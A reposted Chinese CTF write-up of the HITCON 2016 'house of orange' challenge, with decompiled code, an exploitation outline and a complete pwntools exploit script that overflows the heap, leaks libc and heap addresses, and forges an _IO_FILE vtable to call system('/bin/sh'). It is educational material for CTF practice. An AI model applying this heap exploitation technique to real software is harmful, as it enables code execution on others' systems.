2016 ctf-HITCON——houseoforange

最新推荐文章于 2022-08-07 20:55:46 发布
最新推荐文章于 2022-08-07 20:55:46 发布
阅读量368 收藏
点赞数
原文链接:http://www.cnblogs.com/pfcode/p/10771370.html
版权

64位程序,保护全开  #house of orange #unsorted bin attack #IO_FILE

程序逻辑

 1 void __fastcall __noreturn main(__int64 a1, char **a2, char **a3)
 2 {
 3   signed int v3; // eax
 4 
 5   main_init();
 6   while ( 1 )
 7   {
 8     while ( 1 )
 9     {
10       menu();
11       v3 = read_int();
12       if ( v3 != 2 )
13         break;
14       see_house();
15     }
16     if ( v3 > 2 )
17     {
18       if ( v3 == 3 )
19       {
20         upgrade_house();
21       }
22       else
23       {
24         if ( v3 == 4 )
25         {
26           puts("give up");
27           exit(0);
28         }
29 LABEL_14:
30         puts("Invalid choice");
31       }
32     }
33     else
34     {
35       if ( v3 != 1 )
36         goto LABEL_14;
37       build_house();
38     }
39   }
40 }

build house函数,第一次malloc(0x10)申请结构体内存,第二次malloc(size)申请内存保存name,第三次calloc(1,8)申请内存保存color信息

 1 int build_house()
 2 {
 3   unsigned int size; // [rsp+8h] [rbp-18h]
 4   signed int color_id; // [rsp+Ch] [rbp-14h]
 5   void *v3; // [rsp+10h] [rbp-10h]
 6   _DWORD *v4; // [rsp+18h] [rbp-8h]
 7 
 8   if ( num > 3u )
 9   {
10     puts("Too many house");
11     exit(1);
12   }
13   v3 = malloc(0x10uLL);
14   printf("Length of name :");
15   size = read_int();
16   if ( size > 0x1000 )
17     size = 4096;
18   *((_QWORD *)v3 + 1) = malloc(size);
19   if ( !*((_QWORD *)v3 + 1) )
20   {
21     puts("Malloc error !!!");
22     exit(1);
23   }
24   printf("Name :");
25   read_str(*((void **)v3 + 1), size);
26   v4 = calloc(1uLL, 8uLL);
27   printf("Price of Orange:", 8LL);
28   *v4 = read_int();
29   chose_color();
30   printf("Color of Orange:");
31   color_id = read_int();
32   if ( color_id != 56746 && (color_id <= 0 || color_id > 7) )
33   {
34     puts("No such color");
35     exit(1);
36   }
37   if ( color_id == 56746 )
38     v4[1] = 56746;
39   else
40     v4[1] = color_id + 30;
41   *(_QWORD *)v3 = v4;
42   cur_house = v3;
43   ++num;
44   return puts("Finish");
45 }

upgrade house时的size与build时的size可以不同,最大为0x1000字节,造成堆溢出

 1 int upgrade_house()
 2 {
 3   _DWORD *v1; // rbx
 4   unsigned int v2; // [rsp+8h] [rbp-18h]
 5   signed int v3; // [rsp+Ch] [rbp-14h]
 6 
 7   if ( unk_203074 > 2u )
 8     return puts("You can't upgrade more");
 9   if ( !cur_house )
10     return puts("No such house !");
11   printf("Length of name :");
12   v2 = read_int();
13   if ( v2 > 0x1000 )
14     v2 = 4096;
15   printf("Name:");
16   read_str((void *)cur_house[1], v2);
17   printf("Price of Orange: ", v2);
18   v1 = (_DWORD *)*cur_house;
19   *v1 = read_int();
20   chose_color();
21   printf("Color of Orange: ");
22   v3 = read_int();
23   if ( v3 != 56746 && (v3 <= 0 || v3 > 7) )
24   {
25     puts("No such color");
26     exit(1);
27   }
28   if ( v3 == 56746 )
29     *(_DWORD *)(*cur_house + 4LL) = 56746;
30   else
31     *(_DWORD *)(*cur_house + 4LL) = v3 + 30;
32   ++unk_203074;
33   return puts("Finish");
34 }

利用思路

①通过堆溢出,修改top chunk的大小,然后分配一个大小大于top chunk大小的chunk,所以 旧top chunk就会被free掉,进入unsorted bin中,将其称为old top chunk
 大小满足
  1. 大于MINSIZE(0X10)
  2. 小于所需的大小 + MINSIZE
  3. prev inuse位设置为1
  4. old_top + oldsize的值是页对齐的
②然后再分配一个大小在large bin 的大小范围内的chunk,那么这个chunk的fd,bk字段指向main_arena中地址,fd_nextsize,bk_nextzsize字段指向堆中地址,通过两次upgrade和see将libc地址和heap地址都泄露出来。
③之后通过堆溢出修改old top chunk的size字段为0x61,利用unsorted bin attack将 _IO_list_all修改为main_arena+0x58(即&unsorted_bin+0x10)
④此时在&unsorted_bin+0x10处即为一个fake _IO_FILE结构,偏移0x60处即为chain,指向下一个_IO_FILE结构,而此处为main_arena中smallbin[4],之前将old top chunk的size字段改为0x61,之后会进入smallbin[4],而之前smallbin为空,所以链表头即为old top chunk,即chain指向old top chunk。
⑤第③步溢出时即可在old top chunk处伪造好fake _IO_FILE结构,偏移0x20处为_IO_write_base,偏移0x28处为_IO_write_ptr,偏移0xc8处为_mode,偏移0xd8处为ptr_vtable
   绕过检测:
        1._mode<=0
        2._IO_write_base<IO_write_ptr
⑥ptr_vtable指向伪造的vtable处,vtable[3]为IO_overflow函数地址,将vtable[3]伪造为system地址,
⑦如果再进入build_house函数,进行malloc(0x10),由于0x10<=2*SIZE_SZ,就会触发malloc_printerr,会遍历IO_llist_all,通过chain找到最终伪造的在old top chunk处的_IO_FILE,然后找到vtable,最终调用 IO_overflow函数
⑧调用IO_overflow时会传入_IO_FILE结构指针作为参数,将old top chunk处伪造的_IO_FILE的前几个字节修改为/bin/sh\x00 即最终调用为system('/bin/sh')
 
expolit 
  1 from pwn import*
  2 
  3 p = process('./house_of_orange')
  4 elf = ELF('./house_of_orange')
  5 libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
  6 
  7 def menu(idx):
  8     p.recvuntil(': ')
  9     p.sendline(str(idx))
 10 
 11 def see():
 12     menu(2)
 13 
 14 def build(length, nm, pz, color):
 15     menu(1)
 16     p.recvuntil(":")
 17     p.sendline(str(length))
 18     p.recvuntil(":")
 19     p.send(nm)
 20     p.recvuntil(":")
 21     p.sendline(str(pz))
 22     p.recvuntil(":")
 23     p.sendline(str(color))
 24 
 25 def upgrade(length, nm, pz, color):
 26     menu(3)
 27     p.recvuntil(":")
 28     p.sendline(str(length))
 29     p.recvuntil(":")
 30     p.send(nm)
 31     p.recvuntil(":")
 32     p.sendline(str(pz))
 33     p.recvuntil(":")
 34     p.sendline(str(color))
 35 
 36 #set top_chunk->size=0xf81
 37 build(0x30,'a'*8,123,1)
 38 payload = 'a'*0x30 + p64(0) + p64(0x21) +'a'*16+ p64(0)+ p64(0xf81)
 39 upgrade(len(payload),payload,123,2)
 40 
 41 #top_chunk to unsorted bin
 42 build(0x1000,'b',123,1)
 43 log.info('-----------------------leak address-------------------------')
 44 
 45 #malloc largechunk to use old_top
 46 #leak libc_base
 47 build(0x400,'a'*8,123,1)
 48 #gdb.attach(p)
 49 off_to_libc_base=0x3c4b20
 50 off_to_main_arena=1640
 51 see()
 52 p.recvuntil("a"*8)
 53 leak = u64(p.recv(6).ljust(8,'\x00'))
 54 libc_base = leak -off_to_main_arena- off_to_libc_base
 55 print "libc base address -->[%s]"%hex(libc_base)
 56 
 57 #malloc largechunk again
 58 #leak heap_base
 59 upgrade(0x400,'a'*16,123,1)
 60 #gdb.attach(p)
 61 off_to_heap_base=0xe0
 62 see()
 63 p.recvuntil('a'*16)
 64 leak_heap = u64(p.recv(6).ljust(8,'\x00'))
 65 heap_base = leak_heap - off_to_heap_base
 66 print "leak_heap -->[%s]"%hex(leak_heap)
 67 print "heap_base -->[%s]"%hex(heap_base)
 68 
 69 #unsorted bin attack
 70 #_IO_list_all -> &unsorted bin-0x10  //fake _IO_FILE in main_arena
 71 #*(_IO_FILE+0X68)=*(&unsorted bin-0x10+0x68)
 72 #chain=smallbin[4]
 73 #old_top_chunk->size=0x61
 74 #old_top_chunk to smallbin[4]
 75 #chain -> old_top_chunk
 76 #make fake _IO_FILE in old_top_chunk
 77 _IO_list_all = libc.symbols['_IO_list_all'] + libc_base
 78 system = libc.symbols['system'] + libc_base
 79 log.info('-------------------------unsorted bin and build fake file--------------------------')
 80 payload = 'a'*0x400
 81 payload += p64(0) + p64(0x21) + 'a'*0x10
 82 #old_top_chunk=_IO_FILE
 83 fake_file = '/bin/sh\x00' + p64(0x61)
 84 fake_file += p64(0) + p64(_IO_list_all - 0x10)#unsorted bin attack
 85 fake_file += p64(0) + p64(1) 
 86 #bypass check
 87 #_IO_FILE fp
 88 #fp->_IO_write_base < fp->_IO_write_ptr (offset *(0x20)<*(0x28))
 89 #fp->_mode<=0   (offset *(0xc8)<=0)
 90 fake_file = fake_file.ljust(0xc0,'\x00')
 91 payload += fake_file
 92 payload += p64(0)*3
 93 #0xc0+0x18=0xd8
 94 #_IO_jump_t *ptr_vtable
 95 #file_adr+0xd8=&ptr_vtable
 96 #vtable[3]=overflow_adr
 97 #gdb.attach(p)
 98 payload += p64(heap_base + 0x5f0)#ptr_vtable
 99 payload += p64(0)*3#vtable
100 payload += p64(system)#vtable[3]
101 upgrade(0x800,payload,123,1)
102 p.recv()
103 p.sendline('1')
104 #malloc size<=2*SIZE_SZ
105 #malloc(0x10) -> malloc_printerr ->overflow(IO_list_all) ->system('/bin/sh')
106 p.interactive()

 

转载于:https://www.cnblogs.com/pfcode/p/10771370.html

aaa15893831716
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
2016-HitCon-Pwn-house_of_orange学习(附赠FSOP基础知识)
a2590035252的博客
10-25 376
[md]这里开始著名的house of orange利用方式讲解 house of orange 介绍 House of Orange 与其他的 House of XX 利用方法不同,这种利用方法来自于 Hitcon CTF 2016 中的一道同名题目。由于这种利用方法在此前的 CTF 题目中没有出现过,因此之后出现的一系列衍生题目的利用方法我们称之为 House of Orange。 概述 House of Orange 的利用比较特殊,首先需要目标漏洞是堆上的漏洞但是特殊之处在于题目中不存在 free
houseoforange_hitcon_2016House of orange, unsorted bin attack,FSOP)
weixin_44145820的博客
04-27 1367
目录题目分析漏洞利用Exp 题目分析 只有添加,显示,编辑三个功能,没有删除 添加函数,最多只能添加四次,每次添加会依次执行malloc(0x10),malloc(name_size),calloc(8) House结构体如下 在编辑函数中,可以进行堆溢出,因为House没有把name的size保存下来 编辑次数最多为3 漏洞利用 Exp ...
houseoforange_hitcon_2016
z1r0的博客
03-09 446
houseoforange_hitcon_2016 查看保护 这一题目就是使用house of orange + FSOP来解决 在edit的时候会让用户输入size,这里有一个堆溢出(笔者认为这一题还有一个考点就是逆清楚这个程序,自己增加结构体 这是笔者加的两个结构体,看成这样就行 struct Data{ Info *info; char *name } struct Info{ int price; int color; } 加了这个之后改一下堆块的类型就可以更快的清楚这个程序的结构。 回归
Hitcon CTF 2016 - house of orange 做题笔记
fa1c4的blog
03-31 840
前言 深入学习pwn的高级堆利用方法, house of orange是绕不开的难关 之前已经接触了house系列题目, 不过由于心理压迫感, 所以迟迟没有开始调试house的漏洞 现在避无可避了, 于是准备集中精力突破掉house of orange 想要打过BOSS得先升级, 但是为了升级必须先打过BOSS (雾~ 分析过程 CTFhub和BUUCTF的题目有差别, 就按BUU来打吧 漏洞利用 总结 参考 ...
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
Google-CTF-2016-Stego.pcap数据包
最新发布
10-08
Google-CTF-2016-Stego.pcap数据包
ctf-tools-linux-master.zip
06-22
ctf集成工具包-linux版
ctf-wscan-master.zip
12-08
ctf-wscan-master.zip Linux下安装运行
House of orange
tbsqigongzi的博客
08-07 928
题目中不存在 free 函数或其他释放堆块的函数。
houseoforange_hitcon_2016 House of orange
wuyvle的博客
04-14 1198
这个题可真是经典,甚至连方法都是来源于此 看了看 防御全开 看看函数 根据题分析,本题是没有释放功能的,但是如果没有空闲的chunk我们难以获取libc地址 但是如果我们申请的chunk大小比top chunk大,这里需要满足几个条件: topchunk size > MINSIZE(0x10) top chunk inuse位为1 修改之后的 size 必须要对齐到内存页 我们add函数大小和次数都有限制,所以我们要修改top chunk的size位,使其进入unsorted bins。 还涉及
ctf-HITCON-2016-houseoforange学习
weixin_30266829的博客
01-10 217
目录 堆溢出点 利用步骤   创建第一个house,修改top_chunk的size   创建第二个house,触发sysmalloc中的_int_free   创建第三个house,泄露libc和heap的地址   创建第四个house,触发异常 一点疑惑 参考资料 堆溢出点 图1  堆溢出点   edit函数中没有对那么长度进行校验。 利用步骤 创建第一个...
攻防世界 进阶 houseoforange
yongbaoii的博客
03-12 600
就是house of orange 跟题目名字一摸一样。 保护 绿油油 build 备注一写顿时简单了起来。 结构分析一下。 那orange的颜色要么就是56746,要么就是0到6. see 然后呢这里56746跟30到36输出是不一样的。 upgrade 房子只能申请三个,改也只能改三次。 对修改的大小没有限制,所以就会有堆溢出。 那问题来了,怎么利用? 他没有free函数,这就是标准的house of orange 我们总体的思路是这样的。 创建第一个house,修改top_chunk的siz
house of orange学习报告
qq_35467337的博客
03-08 789
house of orangehouse of orange 不是什么梗,而是一道题目的名字,记录下hitcon 2016ctf house of orange
houseoforange_hitcon_2016(unsortbin attack,fsop)
m0_51251108的博客
11-15 386
houseoforange_hitcon_2016: 很经典的一道题目,checsec一下,保护全开 程序分析: 这题最主要就是没有free 漏洞分析: edit里的length和add里的length没有联系, 我们可以造成堆溢出 大致思路: 1.释放到unsortbin中,泄露libc_base和heap_addr: 利用堆溢出,改Top_chunk_size为一个较小的值,我们再申请一个大于Top_chunk_size的chunk的话,系统会用sysmalloc来分配堆,如果符合sysmalloc
格式化字符串漏洞-无限循环
playmaker的博客
06-16 1527
格式化字符串漏洞-无限循环 程序大致逻辑如下,程序存在system函数,保护只开了NX setvbuf(stdin, 0, 2, 0); setvbuf(stdout, 0, 2, 0); puts("Welcome to my ctf! What's your name?"); __isoc99_scanf("%64s", &format); printf("Hello...
CTF-PWN-HouseOfGrey(栈溢出+maps泄露地址+mem泄露内存)
SuperGate的博客
01-27 1089
程序概述 [*] '/home/supergate/Desktop/Pwn/pwn' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled 查看程序保护后发现保护全开 supergate...
the house of orange解析
小强的博客
11-24 2189
先以这个最简单的例子举例: https://github.com/shellphish/how2heap/blob/master/house_of_orange.c 编译生成ELF文件(64位) p1 = malloc(0x400-16); 每次创建堆都是从top chunk上切割堆块,由于top chunk默认是0x21000,因为我们已经申请了0x400大小的堆,所以此时to
[hitcon 2017]ssrfme 1
04-11
这道题目是一个SSRF漏洞题目。SSRF全称为Server Side Request Forgery,是一种常见的Web安全漏洞。当存在SSRF漏洞时,攻击者可以将服务器作为代理,进而访问在内部网络中无法访问的资源,如内部Web应用、数据库等。此题的目标是通过一个输入参数包含的URL,探测出内部的flag并输出。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值